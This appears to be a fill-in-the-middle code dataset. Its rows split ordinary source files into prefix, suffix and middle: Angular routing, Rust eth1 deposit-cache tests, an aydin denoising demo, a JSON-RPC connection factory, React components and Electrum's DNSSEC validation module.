file_name (string, 3–137 chars) | prefix (string, 0–918k chars) | suffix (string, 0–962k chars) | middle (string, 0–812k chars)
---|---|---|---|
app-routing.module.ts | import {NgModule} from '@angular/core';
import {Routes, RouterModule} from '@angular/router';
import {IsLoginGuard} from './guards/is-login.guard';
import {ChatComponent} from './components/chat/chat.component';
import {RoomsComponent} from './components/rooms/rooms.component';
import {NotFoundComponent} from './components/not-found/not-found.component';
import {LoginComponent} from './components/login/login.component';
import {
CHAT_ROOMS_URL,
CHAT_URL
} from './consts';
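// '' serves the login page, the chat routes are protected by IsLoginGuard,
// and any unknown path falls through to NotFoundComponent.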
const routes: Routes = [
{path: '', component: LoginComponent},
{path: CHAT_URL, component: ChatComponent, canActivate: [IsLoginGuard]},
{path: CHAT_ROOMS_URL, component: RoomsComponent, canActivate: [IsLoginGuard]},
{
path: '**',
component: NotFoundComponent
}
];
@NgModule({
imports: [RouterModule.forRoot(routes)],
exports: [RouterModule]
})
export class | {
}
| AppRoutingModule |
test.rs | #![cfg(test)]
use environment::{Environment, EnvironmentBuilder};
use eth1::http::{get_deposit_count, get_deposit_logs_in_range, get_deposit_root, Block, Log};
use eth1::{Config, Service};
use eth1::{DepositCache, DepositLog};
use eth1_test_rig::GanacheEth1Instance;
use futures::Future;
use merkle_proof::verify_merkle_proof;
use std::ops::Range;
use std::time::Duration;
use tokio::runtime::Runtime;
use tree_hash::TreeHash;
use types::{DepositData, EthSpec, Hash256, Keypair, MainnetEthSpec, MinimalEthSpec, Signature};
use web3::{transports::Http, Web3};
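/// Depth of the deposit contract's Merkle tree.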
const DEPOSIT_CONTRACT_TREE_DEPTH: usize = 32;
pub fn new_env() -> Environment<MinimalEthSpec> {
EnvironmentBuilder::minimal()
// Use a single thread so that, when all tests run in parallel, they don't
// spawn an excessive number of threads.
.single_thread_tokio_runtime()
.expect("should start tokio runtime")
.null_logger()
.expect("should start null logger")
.build()
.expect("should build env")
}
fn timeout() -> Duration {
Duration::from_secs(2)
}
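/// Builds a randomly-keyed, correctly-signed deposit of 32 ETH (in Gwei).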
fn random_deposit_data() -> DepositData {
let keypair = Keypair::random();
let mut deposit = DepositData {
pubkey: keypair.pk.into(),
withdrawal_credentials: Hash256::zero(),
amount: 32_000_000_000,
signature: Signature::empty_signature().into(),
};
deposit.signature = deposit.create_signature(&keypair.sk, &MainnetEthSpec::default_spec());
deposit
}
/// Blocking operation to get the deposit logs from the `deposit_contract`.
fn blocking_deposit_logs(
runtime: &mut Runtime,
eth1: &GanacheEth1Instance,
range: Range<u64>,
) -> Vec<Log> {
runtime
.block_on(get_deposit_logs_in_range(
&eth1.endpoint(),
&eth1.deposit_contract.address(),
range,
timeout(),
))
.expect("should get logs")
}
/// Blocking operation to get the deposit root from the `deposit_contract`.
fn blocking_deposit_root(
runtime: &mut Runtime,
eth1: &GanacheEth1Instance,
block_number: u64,
) -> Option<Hash256> {
runtime
.block_on(get_deposit_root(
&eth1.endpoint(),
&eth1.deposit_contract.address(),
block_number,
timeout(),
))
.expect("should get deposit root")
}
/// Blocking operation to get the deposit count from the `deposit_contract`.
fn blocking_deposit_count(
runtime: &mut Runtime,
eth1: &GanacheEth1Instance,
block_number: u64,
) -> Option<u64> {
runtime
.block_on(get_deposit_count(
&eth1.endpoint(),
&eth1.deposit_contract.address(),
block_number,
timeout(),
))
.expect("should get deposit count")
}
fn get_block_number(runtime: &mut Runtime, web3: &Web3<Http>) -> u64 {
runtime
.block_on(web3.eth().block_number().map(|v| v.as_u64()))
.expect("should get block number")
}
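/// Tests for how the eth1 `Service` builds, updates and prunes its block cache.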
mod eth1_cache {
use super::*;
#[test]
fn simple_scenario() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
for follow_distance in 0..2 {
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let initial_block_number = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: initial_block_number,
follow_distance,
..Config::default()
},
log.clone(),
);
// Create some blocks and then consume them, performing the test `rounds` times.
for round in 0..2 {
let blocks = 4;
let initial = if round == 0 {
initial_block_number
} else {
service
.blocks()
.read()
.highest_block_number()
.map(|n| n + follow_distance)
.expect("should have a latest block after the first round")
};
for _ in 0..blocks {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should update deposit cache");
runtime
.block_on(service.update_block_cache())
.expect("should update block cache");
runtime
.block_on(service.update_block_cache())
.expect("should update cache when nothing has changed");
assert_eq!(
service
.blocks()
.read()
.highest_block_number()
.map(|n| n + follow_distance),
Some(initial + blocks),
"should update {} blocks in round {} (follow {})",
blocks,
round,
follow_distance,
);
}
}
}
/// Tests the case where we attempt to download more blocks than will fit in the cache.
#[test]
fn big_skip() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let cache_len = 4;
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: get_block_number(runtime, &web3),
follow_distance: 0,
block_cache_truncation: Some(cache_len),
..Config::default()
},
log,
);
let blocks = cache_len * 2;
for _ in 0..blocks {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block")
}
runtime
.block_on(service.update_deposit_cache())
.expect("should update deposit cache");
runtime
.block_on(service.update_block_cache())
.expect("should update block cache");
assert_eq!(
service.block_cache_len(),
cache_len,
"should not grow cache beyond target"
);
}
/// Tests to ensure that the cache gets pruned when doing multiple downloads smaller than the
/// cache size.
#[test]
fn pruning() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let cache_len = 4;
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: get_block_number(runtime, &web3),
follow_distance: 0,
block_cache_truncation: Some(cache_len),
..Config::default()
},
log,
);
for _ in 0..4 {
for _ in 0..cache_len / 2 {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block")
}
runtime
.block_on(service.update_deposit_cache())
.expect("should update deposit cache");
runtime
.block_on(service.update_block_cache())
.expect("should update block cache");
}
assert_eq!(
service.block_cache_len(),
cache_len,
"should not grow cache beyond target"
);
}
#[test]
fn double_update() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let n = 16;
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
lowest_cached_block_number: get_block_number(runtime, &web3),
follow_distance: 0,
..Config::default()
},
log,
);
for _ in 0..n {
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block")
}
runtime
.block_on(
service
.update_deposit_cache()
.join(service.update_deposit_cache()),
)
.expect("should perform two simultaneous updates of deposit cache");
runtime
.block_on(
service
.update_block_cache()
.join(service.update_block_cache()),
)
.expect("should perform two simultaneous updates of block cache");
assert!(service.block_cache_len() >= n, "should grow the cache");
}
}
mod deposit_tree {
use super::*;
#[test]
fn updating() |
#[test]
fn double_update() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let n = 8;
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let start_block = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: start_block,
lowest_cached_block_number: start_block,
follow_distance: 0,
..Config::default()
},
log,
);
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
}
runtime
.block_on(
service
.update_deposit_cache()
.join(service.update_deposit_cache()),
)
.expect("should perform two updates concurrently");
assert_eq!(service.deposit_cache_len(), n);
}
#[test]
fn cache_consistency() {
let mut env = new_env();
let runtime = env.runtime();
let n = 8;
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let mut deposit_roots = vec![];
let mut deposit_counts = vec![];
// Perform deposits to the smart contract, recording its state along the way.
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
let block_number = get_block_number(runtime, &web3);
deposit_roots.push(
blocking_deposit_root(runtime, &eth1, block_number)
.expect("should get root if contract exists"),
);
deposit_counts.push(
blocking_deposit_count(runtime, &eth1, block_number)
.expect("should get count if contract exists"),
);
}
let mut tree = DepositCache::default();
// Pull all the deposit logs from the contract.
let block_number = get_block_number(runtime, &web3);
let logs: Vec<_> = blocking_deposit_logs(runtime, &eth1, 0..block_number)
.iter()
.map(|raw| DepositLog::from_log(raw).expect("should parse deposit log"))
.inspect(|log| {
tree.insert_log(log.clone())
.expect("should add consecutive logs")
})
.collect();
// Check the logs for invariants.
for i in 0..logs.len() {
let log = &logs[i];
assert_eq!(
log.deposit_data, deposits[i],
"log {} should have correct deposit data",
i
);
assert_eq!(log.index, i as u64, "log {} should have correct index", i);
}
// For each deposit, test some more invariants.
for i in 0..n {
// Ensure the deposit count from the smart contract was as expected.
assert_eq!(
deposit_counts[i],
i as u64 + 1,
"deposit count should be accurate"
);
// Ensure that the root from the deposit tree matches what the contract reported.
let (root, deposits) = tree
.get_deposits(0, i as u64, deposit_counts[i], DEPOSIT_CONTRACT_TREE_DEPTH)
.expect("should get deposits");
assert_eq!(
root, deposit_roots[i],
"tree deposit root {} should match the contract",
i
);
// Ensure that the deposits all prove into the root from the smart contract.
let deposit_root = deposit_roots[i];
for (j, deposit) in deposits.iter().enumerate() {
assert!(
verify_merkle_proof(
deposit.data.tree_hash_root(),
&deposit.proof,
DEPOSIT_CONTRACT_TREE_DEPTH + 1,
j,
deposit_root
),
"deposit merkle proof should prove into deposit contract root"
)
}
}
}
}
/// Tests for the base HTTP requests and response handlers.
mod http {
use super::*;
fn get_block(runtime: &mut Runtime, eth1: &GanacheEth1Instance, block_number: u64) -> Block {
runtime
.block_on(eth1::http::get_block(
&eth1.endpoint(),
block_number,
timeout(),
))
.expect("should get block number")
}
#[test]
fn incrementing_deposits() {
let mut env = new_env();
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let block_number = get_block_number(runtime, &web3);
let logs = blocking_deposit_logs(runtime, &eth1, 0..block_number);
assert_eq!(logs.len(), 0);
let mut old_root = blocking_deposit_root(runtime, &eth1, block_number);
let mut old_block = get_block(runtime, &eth1, block_number);
let mut old_block_number = block_number;
assert_eq!(
blocking_deposit_count(runtime, &eth1, block_number),
Some(0),
"should have deposit count zero"
);
for i in 1..=8 {
runtime
.block_on(eth1.ganache.increase_time(1))
.expect("should be able to increase time on ganache");
deposit_contract
.deposit(runtime, random_deposit_data())
.expect("should perform a deposit");
// Check the logs.
let block_number = get_block_number(runtime, &web3);
let logs = blocking_deposit_logs(runtime, &eth1, 0..block_number);
assert_eq!(logs.len(), i, "the number of logs should be as expected");
// Check the deposit count.
assert_eq!(
blocking_deposit_count(runtime, &eth1, block_number),
Some(i as u64),
"should have a correct deposit count"
);
// Check the deposit root.
let new_root = blocking_deposit_root(runtime, &eth1, block_number);
assert_ne!(
new_root, old_root,
"deposit root should change with each deposit"
);
old_root = new_root;
// Check the block hash.
let new_block = get_block(runtime, &eth1, block_number);
assert_ne!(
new_block.hash, old_block.hash,
"block hash should change with each deposit"
);
// Check to ensure the timestamp is increasing
assert!(
old_block.timestamp <= new_block.timestamp,
"block timestamp should increase"
);
old_block = new_block.clone();
// Check the block number.
assert!(
block_number > old_block_number,
"block number should increase"
);
old_block_number = block_number;
// Check to ensure the block root is changing
assert_ne!(
new_root,
Some(new_block.hash),
"the deposit root should be different to the block hash"
);
}
}
}
mod fast {
use super::*;
// Adds deposits into the deposit cache and checks that the deposit count and root
// computed from the cache match the values reported by the deposit contract.
#[test]
fn deposit_cache_query() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let now = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: now,
lowest_cached_block_number: now,
follow_distance: 0,
block_cache_truncation: None,
..Config::default()
},
log,
);
let n = 10;
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
// Mine an extra block between deposits to test for corner cases
runtime
.block_on(eth1.ganache.evm_mine())
.expect("should mine block");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update");
assert!(
service.deposit_cache_len() >= n,
"should have imported n deposits"
);
for block_num in 0..=get_block_number(runtime, &web3) {
let expected_deposit_count = blocking_deposit_count(runtime, &eth1, block_num);
let expected_deposit_root = blocking_deposit_root(runtime, &eth1, block_num);
let deposit_count = service
.deposits()
.read()
.cache
.get_deposit_count_from_cache(block_num);
let deposit_root = service
.deposits()
.read()
.cache
.get_deposit_root_from_cache(block_num);
assert_eq!(
expected_deposit_count, deposit_count,
"deposit count from cache should match queried"
);
assert_eq!(
expected_deposit_root, deposit_root,
"deposit root from cache should match queried"
);
}
}
}
mod persist {
use super::*;
#[test]
fn test_persist_caches() {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let now = get_block_number(runtime, &web3);
let config = Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: now,
lowest_cached_block_number: now,
follow_distance: 0,
block_cache_truncation: None,
..Config::default()
};
let service = Service::new(config.clone(), log.clone());
let n = 10;
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update");
assert!(
service.deposit_cache_len() >= n,
"should have imported n deposits"
);
let deposit_count = service.deposit_cache_len();
runtime
.block_on(service.update_block_cache())
.expect("should perform update");
assert!(
service.block_cache_len() >= n,
"should have imported n eth1 blocks"
);
let block_count = service.block_cache_len();
let eth1_bytes = service.as_bytes();
// Drop service and recover from bytes
drop(service);
let recovered_service = Service::from_bytes(&eth1_bytes, config, log).unwrap();
assert_eq!(
recovered_service.block_cache_len(),
block_count,
"Should have equal cached blocks as before recovery"
);
assert_eq!(
recovered_service.deposit_cache_len(),
deposit_count,
"Should have equal cached deposits as before recovery"
);
}
}
| {
let mut env = new_env();
let log = env.core_context().log;
let runtime = env.runtime();
let n = 4;
let eth1 = runtime
.block_on(GanacheEth1Instance::new())
.expect("should start eth1 environment");
let deposit_contract = &eth1.deposit_contract;
let web3 = eth1.web3();
let start_block = get_block_number(runtime, &web3);
let service = Service::new(
Config {
endpoint: eth1.endpoint(),
deposit_contract_address: deposit_contract.address(),
deposit_contract_deploy_block: start_block,
follow_distance: 0,
..Config::default()
},
log,
);
for round in 0..3 {
let deposits: Vec<_> = (0..n).map(|_| random_deposit_data()).collect();
for deposit in &deposits {
deposit_contract
.deposit(runtime, deposit.clone())
.expect("should perform a deposit");
}
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update");
runtime
.block_on(service.update_deposit_cache())
.expect("should perform update when nothing has changed");
let first = n * round;
let last = n * (round + 1);
let (_root, local_deposits) = service
.deposits()
.read()
.cache
.get_deposits(first, last, last, 32)
.unwrap_or_else(|_| panic!("should get deposits in round {}", round));
assert_eq!(
local_deposits.len(),
n as usize,
"should get the right number of deposits in round {}",
round
);
assert_eq!(
local_deposits
.iter()
.map(|d| d.data.clone())
.collect::<Vec<_>>(),
deposits.to_vec(),
"obtained deposits should match those submitted in round {}",
round
);
}
} |
3D_royer_hcr_transform.py | # flake8: noqa
from aydin.features.standard_features import StandardFeatureGenerator
from aydin.io.datasets import examples_single
from aydin.it.fgr import ImageTranslatorFGR
from aydin.it.transforms.attenuation import AttenuationTransform
from aydin.regression.cb import CBRegressor
from aydin.util.log.log import Log
def | (image):
"""
In some cases it might be usefull to append a compression transform (sqrt) after normalisation,
something akin to a VST transform but without the exact variance stabilisation, and more as a way
to deskew the histogram. There are only a few situations where this truly helps, and there are not many.
So by default this is off.
"""
Log.enable_output = True
# Log.set_log_max_depth(5)
generator = StandardFeatureGenerator(
# include_scale_one=True,
# include_fine_features=True,
# include_corner_features=True,
# include_line_features=True,
# decimate_large_scale_features=False,
# extend_large_scale_features=True,
include_corner_features=True,
include_scale_one=True,
include_fine_features=True,
# include_spatial_features=True,
)
regressor = CBRegressor(patience=20, gpu=True)
it = ImageTranslatorFGR(
feature_generator=generator, regressor=regressor, normaliser_transform='sqrt'
)
it.train(image, image)
denoised = it.translate(image)
ac = AttenuationTransform(axes=0)
corrected = ac.preprocess(image)
it.train(corrected, corrected)
denoised_corrected = it.translate(corrected)
import napari
with napari.gui_qt():
viewer = napari.Viewer()
viewer.add_image(image, name='image')
viewer.add_image(corrected, name='corrected')
viewer.add_image(denoised, name='denoised')
viewer.add_image(denoised_corrected, name='denoised_corrected')
if __name__ == "__main__":
hcr = examples_single.royerlab_hcr.get_array().squeeze()
hcr = hcr[2, :20, 400 : 400 + 256, 700 : 700 + 256]
demo(hcr)
| demo |
connection-factory.ts | import { MessageConnection, createMessageConnection, Logger } from 'vscode-jsonrpc';
import { Channel } from './channel-protocol';
import { ChannelMessageReader } from './reader';
import { ChannelMessageWriter } from './writer';
import { Component } from '@malagu/core'; | export const ConnnectionFactory = Symbol('ConnnectionFactory');
export interface ConnnectionFactory<T> {
create(t: T, logger: Logger): MessageConnection;
}
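// Default implementation: wires a JSON-RPC MessageConnection over a Channel
// and disposes the connection when it closes.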
@Component(ConnnectionFactory)
export class ConnnectionFactoryImpl implements ConnnectionFactory<Channel> {
create(channel: Channel, logger: Logger): MessageConnection {
const messageReader = new ChannelMessageReader(channel);
const messageWriter = new ChannelMessageWriter(channel);
const connection = createMessageConnection(messageReader, messageWriter, logger);
connection.onClose(() => connection.dispose());
return connection;
}
} | |
CreateElementButton.js | import React, { Component } from 'react';
class | extends Component {
onElementCreate = (e) => {
this.props.onElementCreate()
}
render() {
return (
<a className="ui button blue" onClick={ this.onElementCreate }><i className="ui icon plus circle"></i> Add Element</a>
);
}
}
export default CreateElementButton;
| CreateElementButton |
SideDrawer.js | import React from "react";
import ReactDOM from "react-dom";
import { CSSTransition } from "react-transition-group";
import "./SideDrawer.css";
| const SideDrawer = (props) => {
const content = (
<CSSTransition
in={props.show}
classNames="slide-in-left"
timeout={1200}
mountOnEnter
unmountOnExit
>
<aside className="side-drawer" onClick={props.onClick}>
{props.children}
</aside>
</CSSTransition>
);
return ReactDOM.createPortal(content, document.getElementById("drawer-hook"));
};
export default SideDrawer; | |
dnssec.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Check DNSSEC trust chain.
# Todo: verify expiration dates
#
# Based on
# http://backreference.org/2010/11/17/dnssec-verification-with-dig/
# https://github.com/rthalley/dnspython/blob/master/tests/test_dnssec.py
import traceback
import sys
import time
import struct
import dns.name
import dns.query
import dns.dnssec
import dns.message
import dns.resolver
import dns.rdatatype
import dns.rdtypes.ANY.NS
import dns.rdtypes.ANY.CNAME
import dns.rdtypes.ANY.DLV
import dns.rdtypes.ANY.DNSKEY
import dns.rdtypes.ANY.DS
import dns.rdtypes.ANY.NSEC
import dns.rdtypes.ANY.NSEC3
import dns.rdtypes.ANY.NSEC3PARAM
import dns.rdtypes.ANY.RRSIG
import dns.rdtypes.ANY.SOA
import dns.rdtypes.ANY.TXT
import dns.rdtypes.IN.A
import dns.rdtypes.IN.AAAA
from dns.exception import DNSException
# Pure-Python version of dns.dnssec._validate_rsig
import ecdsa
from . import rsakey
def | (rrset, rrsig, keys, origin=None, now=None):
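"""
Pure-Python validation of an RRSIG over an rrset: raises ValidationFailure
on any error, returns None on success. Drop-in replacement for
dns.dnssec._validate_rrsig.
"""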
from dns.dnssec import ValidationFailure, ECDSAP256SHA256, ECDSAP384SHA384
from dns.dnssec import _find_candidate_keys, _make_hash, _is_ecdsa, _is_rsa, _to_rdata, _make_algorithm_id
if isinstance(origin, str):
origin = dns.name.from_text(origin, dns.name.root)
for candidate_key in _find_candidate_keys(keys, rrsig):
if not candidate_key:
raise ValidationFailure('unknown key')
# For convenience, allow the rrset to be specified as a (name, rdataset)
# tuple as well as a proper rrset
if isinstance(rrset, tuple):
rrname = rrset[0]
rdataset = rrset[1]
else:
rrname = rrset.name
rdataset = rrset
if now is None:
now = time.time()
if rrsig.expiration < now:
raise ValidationFailure('expired')
if rrsig.inception > now:
raise ValidationFailure('not yet valid')
hash = _make_hash(rrsig.algorithm)
if _is_rsa(rrsig.algorithm):
keyptr = candidate_key.key
(bytes,) = struct.unpack('!B', keyptr[0:1])
keyptr = keyptr[1:]
if bytes == 0:
(bytes,) = struct.unpack('!H', keyptr[0:2])
keyptr = keyptr[2:]
rsa_e = keyptr[0:bytes]
rsa_n = keyptr[bytes:]
n = ecdsa.util.string_to_number(rsa_n)
e = ecdsa.util.string_to_number(rsa_e)
pubkey = rsakey.RSAKey(n, e)
sig = rrsig.signature
elif _is_ecdsa(rrsig.algorithm):
if rrsig.algorithm == ECDSAP256SHA256:
curve = ecdsa.curves.NIST256p
key_len = 32
digest_len = 32
elif rrsig.algorithm == ECDSAP384SHA384:
curve = ecdsa.curves.NIST384p
key_len = 48
digest_len = 48
else:
# shouldn't happen
raise ValidationFailure('unknown ECDSA curve')
keyptr = candidate_key.key
x = ecdsa.util.string_to_number(keyptr[0:key_len])
y = ecdsa.util.string_to_number(keyptr[key_len:key_len * 2])
assert ecdsa.ecdsa.point_is_valid(curve.generator, x, y)
point = ecdsa.ellipticcurve.Point(curve.curve, x, y, curve.order)
verifying_key = ecdsa.keys.VerifyingKey.from_public_point(point, curve)
r = rrsig.signature[:key_len]
s = rrsig.signature[key_len:]
sig = ecdsa.ecdsa.Signature(ecdsa.util.string_to_number(r),
ecdsa.util.string_to_number(s))
else:
raise ValidationFailure('unknown algorithm %u' % rrsig.algorithm)
hash.update(_to_rdata(rrsig, origin)[:18])
hash.update(rrsig.signer.to_digestable(origin))
if rrsig.labels < len(rrname) - 1:
suffix = rrname.split(rrsig.labels + 1)[1]
rrname = dns.name.from_text('*', suffix)
rrnamebuf = rrname.to_digestable(origin)
rrfixed = struct.pack('!HHI', rdataset.rdtype, rdataset.rdclass,
rrsig.original_ttl)
rrlist = sorted(rdataset)
for rr in rrlist:
hash.update(rrnamebuf)
hash.update(rrfixed)
rrdata = rr.to_digestable(origin)
rrlen = struct.pack('!H', len(rrdata))
hash.update(rrlen)
hash.update(rrdata)
digest = hash.digest()
if _is_rsa(rrsig.algorithm):
digest = _make_algorithm_id(rrsig.algorithm) + digest
if pubkey.verify(bytearray(sig), bytearray(digest)):
return
elif _is_ecdsa(rrsig.algorithm):
diglong = ecdsa.util.string_to_number(digest)
if verifying_key.pubkey.verifies(diglong, sig):
return
else:
raise ValidationFailure('unknown algorithm %s' % rrsig.algorithm)
raise ValidationFailure('verify failure')
# replace validate_rrsig
dns.dnssec._validate_rrsig = python_validate_rrsig
dns.dnssec.validate_rrsig = python_validate_rrsig
dns.dnssec.validate = dns.dnssec._validate
from .util import print_error
# hard-coded trust anchors (root KSKs)
trust_anchors = [
# KSK-2017:
dns.rrset.from_text('.', 1 , 'IN', 'DNSKEY', '257 3 8 AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3+/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kvArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+eoZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfdRUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwNR1AkUTV74bU='),
# KSK-2010:
dns.rrset.from_text('.', 15202, 'IN', 'DNSKEY', '257 3 8 AwEAAagAIKlVZrpC6Ia7gEzahOR+9W29euxhJhVVLOyQbSEW0O8gcCjF FVQUTf6v58fLjwBd0YI0EzrAcQqBGCzh/RStIoO8g0NfnfL2MTJRkxoX bfDaUeVPQuYEhg37NZWAJQ9VnMVDxP/VHL496M/QZxkjf5/Efucp2gaD X6RS6CXpoY68LsvPVjR0ZSwzz1apAzvN9dlzEheX7ICJBBtuA6G3LQpz W5hOA2hzCTMjJPJ8LbqF6dsV6DoBQzgul0sGIcGOYl7OyQdXfZ57relS Qageu+ipAdTTJ25AsRTAoub8ONGcLmqrAmRLKBP1dfwhYB4N7knNnulq QxA+Uk1ihz0='),
]
def check_query(ns, sub, _type, keys):
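"""
Queries nameserver <ns> for <sub>/<_type> with DNSSEC and validates the
answer's RRSIG against <keys> (or against the answer's own DNSKEY rrset
when <keys> is None). Returns the validated rrset.
"""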
q = dns.message.make_query(sub, _type, want_dnssec=True)
response = dns.query.tcp(q, ns, timeout=5)
assert response.rcode() == 0, 'No answer'
answer = response.answer
assert len(answer) != 0, ('No DNS record found', sub, _type)
assert len(answer) != 1, ('No DNSSEC record found', sub, _type)
if answer[0].rdtype == dns.rdatatype.RRSIG:
rrsig, rrset = answer
elif answer[1].rdtype == dns.rdatatype.RRSIG:
rrset, rrsig = answer
else:
raise BaseException('No signature set in record')
if keys is None:
keys = {dns.name.from_text(sub):rrset}
dns.dnssec.validate(rrset, rrsig, keys)
return rrset
def get_and_validate(ns, url, _type):
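"""
Fetches <url>/<_type> from nameserver <ns>, validating the DNSSEC chain
top-down from the hard-coded root trust anchors to the final record.
"""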
# get trusted root key
root_rrset = None
for dnskey_rr in trust_anchors:
try:
# Check if there is a valid signature for the root dnskey
root_rrset = check_query(ns, '', dns.rdatatype.DNSKEY, {dns.name.root: dnskey_rr})
break
except dns.dnssec.ValidationFailure:
# It's OK as long as one key validates
continue
if not root_rrset:
raise dns.dnssec.ValidationFailure('None of the trust anchors found in DNS')
keys = {dns.name.root: root_rrset}
# top-down verification
parts = url.split('.')
for i in range(len(parts), 0, -1):
sub = '.'.join(parts[i-1:])
name = dns.name.from_text(sub)
# If server is authoritative, don't fetch DNSKEY
query = dns.message.make_query(sub, dns.rdatatype.NS)
response = dns.query.udp(query, ns, 3)
assert response.rcode() == dns.rcode.NOERROR, "query error"
rrset = response.authority[0] if len(response.authority) > 0 else response.answer[0]
rr = rrset[0]
if rr.rdtype == dns.rdatatype.SOA:
continue
# get DNSKEY (self-signed)
rrset = check_query(ns, sub, dns.rdatatype.DNSKEY, None)
# get DS (signed by parent)
ds_rrset = check_query(ns, sub, dns.rdatatype.DS, keys)
# verify that a signed DS validates DNSKEY
for ds in ds_rrset:
for dnskey in rrset:
htype = 'SHA256' if ds.digest_type == 2 else 'SHA1'
good_ds = dns.dnssec.make_ds(name, dnskey, htype)
if ds == good_ds:
break
else:
continue
break
else:
raise BaseException("DS does not match DNSKEY")
# set key for next iteration
keys = {name: rrset}
# get TXT record (signed by zone)
rrset = check_query(ns, url, _type, keys)
return rrset
def query(url, rtype):
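"""
Resolves <url>/<rtype> and returns (answer, validated); <validated> is True
only when the full DNSSEC chain verified, otherwise a plain lookup is used.
"""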
# 8.8.8.8 is Google's public DNS server
nameservers = ['8.8.8.8']
ns = nameservers[0]
try:
out = get_and_validate(ns, url, rtype)
validated = True
except BaseException as e:
#traceback.print_exc(file=sys.stderr)
print_error("DNSSEC error:", str(e))
resolver = dns.resolver.get_default_resolver()
out = resolver.query(url, rtype)
validated = False
return out, validated
